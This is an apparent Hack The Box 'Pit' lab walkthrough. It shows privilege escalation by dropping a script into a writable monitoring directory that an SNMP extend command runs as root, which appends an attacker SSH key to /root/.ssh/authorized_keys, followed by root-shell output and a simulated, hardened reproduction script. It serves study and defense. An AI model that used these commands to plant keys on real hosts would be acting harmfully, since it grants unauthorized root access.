OS Command Injection


I discovered that the NET-SNMP-EXTEND-MIB::nsExtendCommand OID, an extension of the Net-SNMP agent, has a custom command configured at /usr/bin/monitor, which executes a series of Bash scripts in the /usr/local/monitoring directory. An ACL on that directory grants the michelle user write and execute, but not read, privileges. Note that this is a filesystem ACL, not an SELinux rule: SELinux governs process and file labels, not directory permission bits.

Using that ACL entry, I was able to test the flaw by dropping a script containing an arbitrary test command into the directory: /usr/bin/monitor executes anything matching the pattern /usr/local/monitoring/check*sh, and write access alone is enough to create such a file even though the directory cannot be listed.

Here I will escalate privileges by writing my own public SSH key into the root user's authorized_keys file.

[michelle@pit monitoring]$ echo 'echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali >> /root/.ssh/authorized_keys' > /usr/local/monitoring/check_ssh.sh
 
[michelle@pit monitoring]$ cat check_ssh.sh
echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali >> /root/.ssh/authorized_keys

It's all set. The next time the nsExtendObjects subtree is queried over SNMP (for example with snmpwalk), snmpd, which runs as root, will execute the nsExtendCommand."Monitoring" entry, which points to /usr/bin/monitor; that in turn runs every /usr/local/monitoring/check*sh, including /usr/local/monitoring/check_ssh.sh, so the key is appended to /root/.ssh/authorized_keys with root privileges.
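The mechanism above, reproduced as an added example (this is not code from the page or from HTB, and /usr/bin/monitor itself is not shown on the page). It simulates the monitor pattern in a temporary directory so it runs offline as an unprivileged user: a simulated monitor executes every check*sh it finds, an "attacker" who can only write into the directory drops check_ssh.sh, and a hardened variant shows the check a maintainer would want, refusing to run anything from a directory or file that group/others can write to. Assumed: monitor runs each matching file with bash, and the snmpd that calls it runs as root. The directory mode 0733 stands in for the ACL on Pit; the SSH key in the payload is a constructed placeholder.

```shell
#!/usr/bin/env bash
# Added example, not the page's or HTB's code. Reproduces the /usr/bin/monitor
# glob-execution pattern the page describes, inside a temp dir, as the current user.

# Simulated /usr/bin/monitor (assumed behaviour: run every check*sh with bash).
# This is the flaw: whoever can create files in DIR gets code execution as the
# caller (root, when snmpd invokes it), and needs no read access to DIR.
vulnerable_monitor() {
  local dir="$1" script
  for script in "$dir"/check*sh; do
    [ -e "$script" ] || continue      # glob matched nothing
    bash "$script"
  done
}

# True if PATH's mode shows write for group or others (parses ls -ld, portable).
# With a POSIX ACL present, the group column shows the ACL mask, so an entry
# such as user:michelle:-wx also makes this return true.
group_or_world_writable() {
  local mode
  mode=$(ls -ld -- "$1" | cut -c1-10)
  [ "${mode:5:1}" = "w" ] || [ "${mode:8:1}" = "w" ]
}

# Hardened stand-in: refuse a writable directory, skip writable scripts.
hardened_monitor() {
  local dir="$1" script
  if group_or_world_writable "$dir"; then
    echo "refusing: $dir is writable by group/others" >&2
    return 1
  fi
  for script in "$dir"/check*sh; do
    [ -e "$script" ] || continue
    if group_or_world_writable "$script"; then
      echo "skipping $script: writable by group/others" >&2
      continue
    fi
    bash "$script"
  done
}

# Lab setup: a monitoring dir the "attacker" can write but not list (0733, like
# the ACL on Pit) and a fake authorized_keys standing in for /root/.ssh/authorized_keys.
# Prints the work dir. The key material is a constructed placeholder.
setup_lab() {
  local work
  work=$(mktemp -d)
  mkdir "$work/monitoring"
  : > "$work/authorized_keys"
  printf 'echo ssh-ed25519 AAAAconstructedNotARealKey attacker@kali >> %s\n' \
    "$work/authorized_keys" > "$work/monitoring/check_ssh.sh"
  chmod 0733 "$work/monitoring"
  echo "$work"
}

# Returns 0 if the dropped script planted the key via the vulnerable monitor.
vulnerable_plants_key() {
  local work rc=1
  work=$(setup_lab)
  vulnerable_monitor "$work/monitoring"
  grep -q 'attacker@kali' "$work/authorized_keys" && rc=0
  rm -rf "$work"
  return $rc
}

# Returns 0 if the hardened monitor refused the directory and planted nothing.
hardened_refuses() {
  local work rc=1
  work=$(setup_lab)
  if ! hardened_monitor "$work/monitoring" 2>/dev/null \
     && ! grep -q 'attacker@kali' "$work/authorized_keys"; then
    rc=0
  fi
  rm -rf "$work"
  return $rc
}

vulnerable_plants_key && echo "vulnerable monitor: key planted"
hardened_refuses && echo "hardened monitor: directory refused, nothing planted"
```

On a real host the same ownership and mode check is the first thing to run against any directory an SNMP extend command globs: `ls -ld` will show the trailing `+` that marks an ACL, and `getfacl` will show exactly who was granted write.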

┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ssh root@pit.htb -i ~/.ssh/id_ed25519 
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
web console: https://pit.htb:9090/
 
Last login: Fri Apr  7 13:14:21 2023 from 10.10.14.5
[root@pit ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@pit ~]# whoami
root
[root@pit ~]# hostname
pit.htb
[root@pit ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:34:c4 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.241/24 brd 10.10.10.255 scope global noprefixroute ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::fc6f:c2ab:4f8e:bbca/64 scope global dynamic noprefixroute 
       valid_lft 86393sec preferred_lft 14393sec
    inet6 fe80::8811:73af:e9e:6b74/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

System-level compromise. The root shell runs in the unconfined_t domain (see the context field in the id output above), so it is also not bound by SELinux.